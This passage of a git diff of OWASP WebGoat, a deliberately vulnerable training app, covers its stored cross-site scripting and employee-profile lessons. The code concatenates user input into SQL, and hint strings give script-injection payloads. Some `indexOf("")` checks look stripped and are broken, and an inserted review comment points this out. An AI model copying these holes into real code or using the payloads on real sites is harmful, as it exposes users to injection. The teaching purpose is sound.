personal_description = ? WHERE userid = ?;"; - try - { - PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); - - ps.setString(1, employee.getFirstName()); - ps.setString(2, employee.getLastName()); - ps.setString(3, employee.getSsn()); - ps.setString(4, employee.getTitle()); - ps.setString(5, employee.getPhoneNumber()); - ps.setString(6, employee.getAddress1()); - ps.setString(7, employee.getAddress2()); - ps.setInt(8, employee.getManager()); - ps.setString(9, employee.getStartDate()); - ps.setString(10, employee.getCcn()); - ps.setInt(11, employee.getCcnLimit()); - ps.setString(12, employee.getPersonalDescription()); - ps.setInt(13, subjectId); - ps.executeUpdate(query); - } - catch (SQLException sqle) - { - s.setMessage("Error updating employee profile"); - sqle.printStackTrace(); - } - + // Fix this method using the org.owasp.webgoat.session.ParameterParser class + return null; } - catch (Exception e) + + public String getNextPage(WebSession s) { - s.setMessage("Error updating employee profile"); - e.printStackTrace(); + return CrossSiteScripting.VIEWPROFILE_ACTION; } - } - - public void createEmployeeProfile(WebSession s, int userId, - Employee employee) throws UnauthorizedException - { - try + public void changeEmployeeProfile(WebSession s, int userId, int subjectId, Employee employee) + throws UnauthorizedException { - // FIXME: Cannot choose the id because we cannot guarantee uniqueness - int nextId = getNextUID(s); - String query = "INSERT INTO employee VALUES ( " + nextId + ", ?,?,?,?,?,?,?,?,?,?,?,?,?,?)"; + try + { + // Note: The password field is ONLY set by ChangePassword + String query = "UPDATE employee SET first_name = ?, last_name = ?, ssn = ?, title = ?, phone = ?, address1 = ?, address2 = ?," + + " manager = ?, start_date = ?, ccn = ?, ccn_limit = ?," + + " personal_description = ? 
WHERE userid = ?;"; + try + { + PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query, + ResultSet.TYPE_SCROLL_INSENSITIVE, + ResultSet.CONCUR_READ_ONLY); - //System.out.println("Query: " + query); + ps.setString(1, employee.getFirstName()); + ps.setString(2, employee.getLastName()); + ps.setString(3, employee.getSsn()); + ps.setString(4, employee.getTitle()); + ps.setString(5, employee.getPhoneNumber()); + ps.setString(6, employee.getAddress1()); + ps.setString(7, employee.getAddress2()); + ps.setInt(8, employee.getManager()); + ps.setString(9, employee.getStartDate()); + ps.setString(10, employee.getCcn()); + ps.setInt(11, employee.getCcnLimit()); + ps.setString(12, employee.getPersonalDescription()); + ps.setInt(13, subjectId); + ps.execute(); + } catch (SQLException sqle) + { + s.setMessage("Error updating employee profile"); + sqle.printStackTrace(); + } - try - { - PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query); - - ps.setString(1, employee.getFirstName().toLowerCase()); - ps.setString(2, employee.getLastName()); - ps.setString(3, employee.getSsn()); - ps.setString(4, employee.getTitle()); - ps.setString(5, employee.getPhoneNumber()); - ps.setString(6, employee.getAddress1()); - ps.setString(7, employee.getAddress2()); - ps.setInt(8, employee.getManager()); - ps.setString(9, employee.getStartDate()); - ps.setString(10, employee.getCcn()); - ps.setInt(11, employee.getCcnLimit()); - ps.setString(12, employee.getDisciplinaryActionDate()); - ps.setString(13, employee.getDisciplinaryActionNotes()); - ps.setString(14, employee.getPersonalDescription()); - - ps.execute(); - } - catch (SQLException sqle) - { - s.setMessage("Error updating employee profile"); - sqle.printStackTrace(); - } + } catch (Exception e) + { + s.setMessage("Error updating employee profile"); + e.printStackTrace(); + } } - catch (Exception e) + + public void doChangeEmployeeProfile_BACKUP(WebSession s, int userId, int subjectId, Employee employee) 
+ throws UnauthorizedException { - s.setMessage("Error updating employee profile"); - e.printStackTrace(); + try + { + // Note: The password field is ONLY set by ChangePassword + String query = "UPDATE employee SET first_name = ?, last_name = ?, ssn = ?, title = ?, phone = ?, address1 = ?, address2 = ?," + + " manager = ?, start_date = ?, ccn = ?, ccn_limit = ?," + + " personal_description = ? WHERE userid = ?;"; + try + { + PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query, + ResultSet.TYPE_SCROLL_INSENSITIVE, + ResultSet.CONCUR_READ_ONLY); + + ps.setString(1, employee.getFirstName()); + ps.setString(2, employee.getLastName()); + ps.setString(3, employee.getSsn()); + ps.setString(4, employee.getTitle()); + ps.setString(5, employee.getPhoneNumber()); + ps.setString(6, employee.getAddress1()); + ps.setString(7, employee.getAddress2()); + ps.setInt(8, employee.getManager()); + ps.setString(9, employee.getStartDate()); + ps.setString(10, employee.getCcn()); + ps.setInt(11, employee.getCcnLimit()); + ps.setString(12, employee.getPersonalDescription()); + ps.setInt(13, subjectId); + ps.executeUpdate(query); + } catch (SQLException sqle) + { + s.setMessage("Error updating employee profile"); + sqle.printStackTrace(); + } + + } catch (Exception e) + { + s.setMessage("Error updating employee profile"); + e.printStackTrace(); + } } - } - - public void createEmployeeProfile_BACKUP(WebSession s, int userId, - Employee employee) throws UnauthorizedException - { - try + public void createEmployeeProfile(WebSession s, int userId, Employee employee) throws UnauthorizedException { - // FIXME: Cannot choose the id because we cannot guarantee uniqueness - int nextId = getNextUID(s); - String query = "INSERT INTO employee VALUES ( " + nextId + ", ?,?,?,?,?,?,?,?,?,?,?,?,?,?)"; + try + { + // FIXME: Cannot choose the id because we cannot guarantee uniqueness + int nextId = getNextUID(s); + String query = "INSERT INTO employee VALUES ( " + nextId + ", 
?,?,?,?,?,?,?,?,?,?,?,?,?,?)"; - //System.out.println("Query: " + query); + // System.out.println("Query: " + query); - try - { - PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query); - - ps.setString(1, employee.getFirstName().toLowerCase()); - ps.setString(2, employee.getLastName()); - ps.setString(3, employee.getSsn()); - ps.setString(4, employee.getTitle()); - ps.setString(5, employee.getPhoneNumber()); - ps.setString(6, employee.getAddress1()); - ps.setString(7, employee.getAddress2()); - ps.setInt(8, employee.getManager()); - ps.setString(9, employee.getStartDate()); - ps.setString(10, employee.getCcn()); - ps.setInt(11, employee.getCcnLimit()); - ps.setString(12, employee.getDisciplinaryActionDate()); - ps.setString(13, employee.getDisciplinaryActionNotes()); - ps.setString(14, employee.getPersonalDescription()); - - ps.execute(); - } - catch (SQLException sqle) - { - s.setMessage("Error updating employee profile"); - sqle.printStackTrace(); - } + try + { + PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query); + + ps.setString(1, employee.getFirstName().toLowerCase()); + ps.setString(2, employee.getLastName()); + ps.setString(3, employee.getSsn()); + ps.setString(4, employee.getTitle()); + ps.setString(5, employee.getPhoneNumber()); + ps.setString(6, employee.getAddress1()); + ps.setString(7, employee.getAddress2()); + ps.setInt(8, employee.getManager()); + ps.setString(9, employee.getStartDate()); + ps.setString(10, employee.getCcn()); + ps.setInt(11, employee.getCcnLimit()); + ps.setString(12, employee.getDisciplinaryActionDate()); + ps.setString(13, employee.getDisciplinaryActionNotes()); + ps.setString(14, employee.getPersonalDescription()); + + ps.execute(); + } catch (SQLException sqle) + { + s.setMessage("Error updating employee profile"); + sqle.printStackTrace(); + } + } catch (Exception e) + { + s.setMessage("Error updating employee profile"); + e.printStackTrace(); + } } - catch (Exception e) + + public 
void createEmployeeProfile_BACKUP(WebSession s, int userId, Employee employee) throws UnauthorizedException { - s.setMessage("Error updating employee profile"); - e.printStackTrace(); + try + { + // FIXME: Cannot choose the id because we cannot guarantee uniqueness + int nextId = getNextUID(s); + String query = "INSERT INTO employee VALUES ( " + nextId + ", ?,?,?,?,?,?,?,?,?,?,?,?,?,?)"; + + // System.out.println("Query: " + query); + + try + { + PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query); + + ps.setString(1, employee.getFirstName().toLowerCase()); + ps.setString(2, employee.getLastName()); + ps.setString(3, employee.getSsn()); + ps.setString(4, employee.getTitle()); + ps.setString(5, employee.getPhoneNumber()); + ps.setString(6, employee.getAddress1()); + ps.setString(7, employee.getAddress2()); + ps.setInt(8, employee.getManager()); + ps.setString(9, employee.getStartDate()); + ps.setString(10, employee.getCcn()); + ps.setInt(11, employee.getCcnLimit()); + ps.setString(12, employee.getDisciplinaryActionDate()); + ps.setString(13, employee.getDisciplinaryActionNotes()); + ps.setString(14, employee.getPersonalDescription()); + + ps.execute(); + } catch (SQLException sqle) + { + s.setMessage("Error updating employee profile"); + sqle.printStackTrace(); + } + } catch (Exception e) + { + s.setMessage("Error updating employee profile"); + e.printStackTrace(); + } } - } + /** + * Validates that the given parameter value matches the given regular expression pattern. + * + * @param parameter + * @param pattern + * @return + * @throws ValidationException + */ + protected String validate(final String parameter, final Pattern pattern) throws ValidationException + { + Matcher matcher = pattern.matcher(parameter); + if (!matcher.matches()) throw new ValidationException(); - /** - * Validates that the given parameter value matches the given regular expression pattern. 
- * - * @param parameter - * @param pattern - * @return - * @throws ValidationException - */ - protected String validate(final String parameter, final Pattern pattern) - throws ValidationException - { - Matcher matcher = pattern.matcher(parameter); - if (!matcher.matches()) - throw new ValidationException(); + return parameter; + } - return parameter; - } - - private int getNextUID(WebSession s) - { - int uid = -1; - try - { - Statement statement = WebSession.getConnection(s).createStatement( - ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - ResultSet results = statement - .executeQuery("select max(userid) as uid from employee"); - results.first(); - uid = results.getInt("uid"); - } - catch (SQLException sqle) - { - sqle.printStackTrace(); - s.setMessage("Error updating employee profile"); - } - catch (ClassNotFoundException e) - { - // TODO Auto-generated catch block - e.printStackTrace(); - } - return uid + 1; - } + private int getNextUID(WebSession s) + { + int uid = -1; + try + { + Statement statement = WebSession.getConnection(s).createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, + ResultSet.CONCUR_READ_ONLY); + ResultSet results = statement.executeQuery("select max(userid) as uid from employee"); + results.first(); + uid = results.getInt("uid"); + } catch (SQLException sqle) + { + sqle.printStackTrace(); + s.setMessage("Error updating employee profile"); + } catch (ClassNotFoundException e) + { + // TODO Auto-generated catch block + e.printStackTrace(); + } + return uid + 1; + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/ViewProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/ViewProfile.java index c694b93ba..83a70aad2 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/ViewProfile.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/ViewProfile.java 
@@ -1,9 +1,9 @@ + package org.owasp.webgoat.lessons.CrossSiteScripting; import java.sql.ResultSet; import java.sql.SQLException; import java.sql.Statement; - import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction; import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial; import org.owasp.webgoat.session.Employee; 
@@ -13,240 +13,200 @@ import org.owasp.webgoat.session.UnauthorizedException; import org.owasp.webgoat.session.ValidationException; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ */ public class ViewProfile extends DefaultLessonAction { - public ViewProfile(GoatHillsFinancial lesson, String lessonName, - String actionName) - { - super(lesson, lessonName, actionName); - } - - - public void handleRequest(WebSession s) throws ParameterNotFoundException, - UnauthenticatedException, UnauthorizedException, - ValidationException - { - getLesson().setCurrentAction(s, getActionName()); - - if (isAuthenticated(s)) + public ViewProfile(GoatHillsFinancial lesson, String lessonName, String actionName) { - int userId = getIntSessionAttribute(s, getLessonName() + "." - + CrossSiteScripting.USER_ID); - int employeeId = -1; - try - { - // User selected employee - employeeId = s.getParser().getIntParameter( - CrossSiteScripting.EMPLOYEE_ID); - } - catch (ParameterNotFoundException e) - { - // May be an internally selected employee - employeeId = getIntRequestAttribute(s, getLessonName() + "." - + CrossSiteScripting.EMPLOYEE_ID); - } - - Employee employee = getEmployeeProfile(s, userId, employeeId); - setSessionAttribute(s, getLessonName() + "." 
- + CrossSiteScripting.EMPLOYEE_ATTRIBUTE_KEY, employee); - - updateLessonStatus(s, employee); + super(lesson, lessonName, actionName); } - else - throw new UnauthenticatedException(); - } - - public String getNextPage(WebSession s) - { - return CrossSiteScripting.VIEWPROFILE_ACTION; - } - - - public Employee getEmployeeProfile(WebSession s, int userId, - int subjectUserId) throws UnauthorizedException - { - Employee profile = null; - - // Query the database for the profile data of the given employee - try + public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException, + UnauthorizedException, ValidationException { - String query = "SELECT * FROM employee WHERE userid = " - + subjectUserId; + getLesson().setCurrentAction(s, getActionName()); - try - { - Statement answer_statement = WebSession.getConnection(s) - .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - ResultSet answer_results = answer_statement.executeQuery(query); - if (answer_results.next()) + if (isAuthenticated(s)) { - // Note: Do NOT get the password field. 
- profile = new Employee(answer_results.getInt("userid"), - answer_results.getString("first_name"), - answer_results.getString("last_name"), - answer_results.getString("ssn"), answer_results - .getString("title"), answer_results - .getString("phone"), answer_results - .getString("address1"), answer_results - .getString("address2"), answer_results - .getInt("manager"), answer_results - .getString("start_date"), answer_results - .getInt("salary"), answer_results - .getString("ccn"), answer_results - .getInt("ccn_limit"), answer_results - .getString("disciplined_date"), - answer_results.getString("disciplined_notes"), - answer_results.getString("personal_description")); - /* System.out.println("Retrieved employee from db: " + - profile.getFirstName() + " " + profile.getLastName() + - " (" + profile.getId() + ")"); - */} - } - catch (SQLException sqle) - { - s.setMessage("Error getting employee profile"); - sqle.printStackTrace(); - } - } - catch (Exception e) - { - s.setMessage("Error getting employee profile"); - e.printStackTrace(); + int userId = getIntSessionAttribute(s, getLessonName() + "." + CrossSiteScripting.USER_ID); + int employeeId = -1; + try + { + // User selected employee + employeeId = s.getParser().getIntParameter(CrossSiteScripting.EMPLOYEE_ID); + } catch (ParameterNotFoundException e) + { + // May be an internally selected employee + employeeId = getIntRequestAttribute(s, getLessonName() + "." + CrossSiteScripting.EMPLOYEE_ID); + } + + Employee employee = getEmployeeProfile(s, userId, employeeId); + setSessionAttribute(s, getLessonName() + "." 
+ CrossSiteScripting.EMPLOYEE_ATTRIBUTE_KEY, employee); + + updateLessonStatus(s, employee); + } + else + throw new UnauthenticatedException(); } - return profile; - } - - - public Employee getEmployeeProfile_BACKUP(WebSession s, int userId, - int subjectUserId) throws UnauthorizedException - { - // Query the database to determine if this employee has access to this function - // Query the database for the profile data of the given employee if "owned" by the given user - - Employee profile = null; - - // Query the database for the profile data of the given employee - try + public String getNextPage(WebSession s) { - String query = "SELECT * FROM employee WHERE userid = " - + subjectUserId; + return CrossSiteScripting.VIEWPROFILE_ACTION; + } - try - { - Statement answer_statement = WebSession.getConnection(s) - .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - ResultSet answer_results = answer_statement.executeQuery(query); - if (answer_results.next()) + public Employee getEmployeeProfile(WebSession s, int userId, int subjectUserId) throws UnauthorizedException + { + Employee profile = null; + + // Query the database for the profile data of the given employee + try { - // Note: Do NOT get the password field. 
- profile = new Employee(answer_results.getInt("userid"), - answer_results.getString("first_name"), - answer_results.getString("last_name"), - answer_results.getString("ssn"), answer_results - .getString("title"), answer_results - .getString("phone"), answer_results - .getString("address1"), answer_results - .getString("address2"), answer_results - .getInt("manager"), answer_results - .getString("start_date"), answer_results - .getInt("salary"), answer_results - .getString("ccn"), answer_results - .getInt("ccn_limit"), answer_results - .getString("disciplined_date"), - answer_results.getString("disciplined_notes"), - answer_results.getString("personal_description")); - /* System.out.println("Retrieved employee from db: " + - profile.getFirstName() + " " + profile.getLastName() + - " (" + profile.getId() + ")"); - */} - } - catch (SQLException sqle) - { - s.setMessage("Error getting employee profile"); - sqle.printStackTrace(); - } - } - catch (Exception e) - { - s.setMessage("Error getting employee profile"); - e.printStackTrace(); - } + String query = "SELECT * FROM employee WHERE userid = " + subjectUserId; - return profile; - } - - - private void updateLessonStatus(WebSession s, Employee employee) - { - String stage = getStage(s); - int userId = -1; - try { - userId = getIntSessionAttribute(s, getLessonName() + "." - + CrossSiteScripting.USER_ID); - } catch (ParameterNotFoundException pnfe) { - } - if (CrossSiteScripting.STAGE1.equals(stage)) - { - String address1 = employee.getAddress1().toLowerCase(); - if (userId != employee.getId() - && address1.indexOf("") > -1) + try + { + Statement answer_statement = WebSession.getConnection(s) + .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); + ResultSet answer_results = answer_statement.executeQuery(query); + if (answer_results.next()) + { + // Note: Do NOT get the password field. 
+ profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"), + answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results + .getString("title"), answer_results.getString("phone"), answer_results + .getString("address1"), answer_results.getString("address2"), answer_results + .getInt("manager"), answer_results.getString("start_date"), answer_results + .getInt("salary"), answer_results.getString("ccn"), answer_results + .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results + .getString("disciplined_notes"), answer_results.getString("personal_description")); + /* + * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " + + * profile.getLastName() + " (" + profile.getId() + ")"); + */} + } catch (SQLException sqle) + { + s.setMessage("Error getting employee profile"); + sqle.printStackTrace(); + } + } catch (Exception e) { - setStageComplete(s, CrossSiteScripting.STAGE1); + s.setMessage("Error getting employee profile"); + e.printStackTrace(); + } + + return profile; + } + + public Employee getEmployeeProfile_BACKUP(WebSession s, int userId, int subjectUserId) throws UnauthorizedException + { + // Query the database to determine if this employee has access to this function + // Query the database for the profile data of the given employee if "owned" by the given + // user + + Employee profile = null; + + // Query the database for the profile data of the given employee + try + { + String query = "SELECT * FROM employee WHERE userid = " + subjectUserId; + + try + { + Statement answer_statement = WebSession.getConnection(s) + .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); + ResultSet answer_results = answer_statement.executeQuery(query); + if (answer_results.next()) + { + // Note: Do NOT get the password field. 
+ profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"), + answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results + .getString("title"), answer_results.getString("phone"), answer_results + .getString("address1"), answer_results.getString("address2"), answer_results + .getInt("manager"), answer_results.getString("start_date"), answer_results + .getInt("salary"), answer_results.getString("ccn"), answer_results + .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results + .getString("disciplined_notes"), answer_results.getString("personal_description")); + /* + * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " + + * profile.getLastName() + " (" + profile.getId() + ")"); + */} + } catch (SQLException sqle) + { + s.setMessage("Error getting employee profile"); + sqle.printStackTrace(); + } + } catch (Exception e) + { + s.setMessage("Error getting employee profile"); + e.printStackTrace(); + } + + return profile; + } + + private void updateLessonStatus(WebSession s, Employee employee) + { + String stage = getStage(s); + int userId = -1; + try + { + userId = getIntSessionAttribute(s, getLessonName() + "." 
+ CrossSiteScripting.USER_ID); + } catch (ParameterNotFoundException pnfe) + { + } + if (CrossSiteScripting.STAGE1.equals(stage)) + { + String address1 = employee.getAddress1().toLowerCase(); + if (userId != employee.getId() && address1.indexOf("") > -1) + { + setStageComplete(s, CrossSiteScripting.STAGE1); + } + } + else if (CrossSiteScripting.STAGE3.equals(stage)) + { + String address2 = employee.getAddress1().toLowerCase(); + if (address2.indexOf("") > -1) + { + setStageComplete(s, CrossSiteScripting.STAGE3); + } + } + else if (CrossSiteScripting.STAGE4.equals(stage)) + { + if (employee.getAddress1().toLowerCase().indexOf("<") > -1) + { + setStageComplete(s, CrossSiteScripting.STAGE4); + } } } - else if (CrossSiteScripting.STAGE3.equals(stage)) - { - String address2 = employee.getAddress1().toLowerCase(); - if (address2.indexOf("") > -1) - { - setStageComplete(s, CrossSiteScripting.STAGE3); - } - } - else if (CrossSiteScripting.STAGE4.equals(stage)) - { - if (employee.getAddress1().toLowerCase().indexOf("<") > -1) - { - setStageComplete(s, CrossSiteScripting.STAGE4); - } - } - } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/DBCrossSiteScripting.java b/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/DBCrossSiteScripting.java index 5832ccc29..71492bd20 100755 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/DBCrossSiteScripting.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/DBCrossSiteScripting.java @@ -1,8 +1,8 @@ + package org.owasp.webgoat.lessons.DBCrossSiteScripting; import java.util.ArrayList; import java.util.List; - import org.apache.ecs.ElementContainer; import org.owasp.webgoat.lessons.Category; import org.owasp.webgoat.lessons.GoatHillsFinancial.DeleteProfile; 
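Review bot: In `getEmployeeProfile` the `answer_statement` and `answer_results` opened inside the inner `try` are never closed on any path, so each profile view leaks a JDBC statement and cursor until the connection is collected; `getEmployeeProfile_BACKUP` repeats the same code and appears to be dead duplicate that could simply be removed. Close both resources in a `finally` block as sketched below (the file predates try-with-resources, so explicit closing is used). In `updateLessonStatus`, `address1.indexOf("") > -1` in STAGE1 and the matching STAGE3 test are always true because `indexOf("")` returns 0, so the stage is marked complete for any profile that passes the `userId != employee.getId()` test — if the literal was a markup token stripped during rendering, confirm that the pattern actually in the source is the intended one, and note that the STAGE3 branch reads `getAddress1()` into a variable named `address2`. The empty `catch (ParameterNotFoundException pnfe) { }` in the same method should carry a comment such as `// no user id in session: userId stays -1, so the STAGE1 identity test passes for every profile`, since that is the observable effect.
```java
Statement answer_statement = null;
ResultSet answer_results = null;
try
{
    answer_statement = WebSession.getConnection(s)
            .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
    answer_results = answer_statement.executeQuery(query);
    // … unchanged: Employee construction from answer_results …
} catch (SQLException sqle)
{
    s.setMessage("Error getting employee profile");
    sqle.printStackTrace();
} finally
{
    if (answer_results != null) try { answer_results.close(); } catch (SQLException ignored) { /* error already reported above */ }
    if (answer_statement != null) try { answer_statement.close(); } catch (SQLException ignored) { /* error already reported above */ }
}
```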
@@ -21,240 +21,221 @@ import org.owasp.webgoat.session.UnauthorizedException; import org.owasp.webgoat.session.ValidationException; import org.owasp.webgoat.session.WebSession; + /** - /******************************************************************************* + * /******************************************************************************* * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * + * */ public class DBCrossSiteScripting extends GoatHillsFinancial { - private final static Integer DEFAULT_RANKING = new Integer(100); + private final static Integer DEFAULT_RANKING = new Integer(100); - public final static String STAGE1 = "Stored XSS"; - - public final static String STAGE2 = "Block Stored XSS using DB Input Validation"; - - protected void registerActions(String className) - { - registerAction(new ListStaff(this, className, LISTSTAFF_ACTION)); - registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION)); - registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION)); - registerAction(new EditProfile(this, className, EDITPROFILE_ACTION)); - registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION)); + public final static String STAGE1 = "Stored XSS"; - // These actions are special in that they chain to other actions. 
- registerAction(new Login(this, className, LOGIN_ACTION, - getAction(LISTSTAFF_ACTION))); - registerAction(new Logout(this, className, LOGOUT_ACTION, - getAction(LOGIN_ACTION))); - registerAction(new FindProfile(this, className, FINDPROFILE_ACTION, - getAction(VIEWPROFILE_ACTION))); - registerAction(new UpdateProfile(this, className, - UPDATEPROFILE_ACTION, getAction(VIEWPROFILE_ACTION))); - registerAction(new DeleteProfile(this, className, - DELETEPROFILE_ACTION, getAction(LISTSTAFF_ACTION))); - } + public final static String STAGE2 = "Block Stored XSS using DB Input Validation"; - /** - * Gets the category attribute of the CrossSiteScripting object - * - * @return The category value - */ - public Category getDefaultCategory() - { - return Category.XSS; - } - - /** - * Gets the hints attribute of the DirectoryScreen object - * - * @return The hints value - */ - protected List getHints(WebSession s) - { - List hints = new ArrayList(); - - // Stage 1 - hints.add("You can put HTML tags in form input fields."); - hints - .add("Bury a SCRIPT tag in the field to attack anyone who reads it."); - hints - .add("Enter this: <script language=\"javascript\" type=\"text/javascript\">alert(\"Ha Ha Ha\");</script> in message fields."); - hints - .add("Enter this: <script>alert(\"document.cookie\");</script> in message fields."); - - // Stage 2 - hints - .add("Many scripts rely on the use of special characters such as: <"); - hints - .add("Allowing only a certain set of characters (positive filtering) is preferred to blocking a set of characters (negative filtering)."); - hints - .add("Oracle 10 supports a regular expression matching function : REGEXP_LIKE(text, pattern)."); - - return hints; - } - - - /** - * Gets the instructions attribute of the ParameterInjection object - * - * @return The instructions value - */ - public String getInstructions(WebSession s) - { - String instructions = ""; - - if (!getLessonTracker(s).getCompleted()) + protected void registerActions(String 
className) { - String stage = getStage(s); - if (STAGE1.equals(stage)) - { - instructions = "Stage 1: Execute a Stored Cross Site Scripting (XSS) attack.
" - + "As 'Tom', execute a Stored XSS attack against the Street field on the Edit Profile page. " - + "Verify that 'Jerry' is affected by the attack. " - + "A sample JavaScript snippet you can use is: <SCRIPT>alert('bang!');</SCRIPT>."; - } - else if (STAGE2.equals(stage)) + registerAction(new ListStaff(this, className, LISTSTAFF_ACTION)); + registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION)); + registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION)); + registerAction(new EditProfile(this, className, EDITPROFILE_ACTION)); + registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION)); + + // These actions are special in that they chain to other actions. + registerAction(new Login(this, className, LOGIN_ACTION, getAction(LISTSTAFF_ACTION))); + registerAction(new Logout(this, className, LOGOUT_ACTION, getAction(LOGIN_ACTION))); + registerAction(new FindProfile(this, className, FINDPROFILE_ACTION, getAction(VIEWPROFILE_ACTION))); + registerAction(new UpdateProfile(this, className, UPDATEPROFILE_ACTION, getAction(VIEWPROFILE_ACTION))); + registerAction(new DeleteProfile(this, className, DELETEPROFILE_ACTION, getAction(LISTSTAFF_ACTION))); + } + + /** + * Gets the category attribute of the CrossSiteScripting object + * + * @return The category value + */ + public Category getDefaultCategory() + { + return Category.XSS; + } + + /** + * Gets the hints attribute of the DirectoryScreen object + * + * @return The hints value + */ + protected List getHints(WebSession s) + { + List hints = new ArrayList(); + + // Stage 1 + hints.add("You can put HTML tags in form input fields."); + hints.add("Bury a SCRIPT tag in the field to attack anyone who reads it."); + hints + .add("Enter this: <script language=\"javascript\" type=\"text/javascript\">alert(\"Ha Ha Ha\");</script> in message fields."); + hints.add("Enter this: <script>alert(\"document.cookie\");</script> in message fields."); + + // Stage 2 + hints.add("Many scripts rely on the use 
of special characters such as: <"); + hints + .add("Allowing only a certain set of characters (positive filtering) is preferred to blocking a set of characters (negative filtering)."); + hints.add("Oracle 10 supports a regular expression matching function : REGEXP_LIKE(text, pattern)."); + + return hints; + } + + /** + * Gets the instructions attribute of the ParameterInjection object + * + * @return The instructions value + */ + public String getInstructions(WebSession s) + { + String instructions = ""; + + if (!getLessonTracker(s).getCompleted()) { - instructions = "Stage 2: Block Stored XSS using Input Validation.
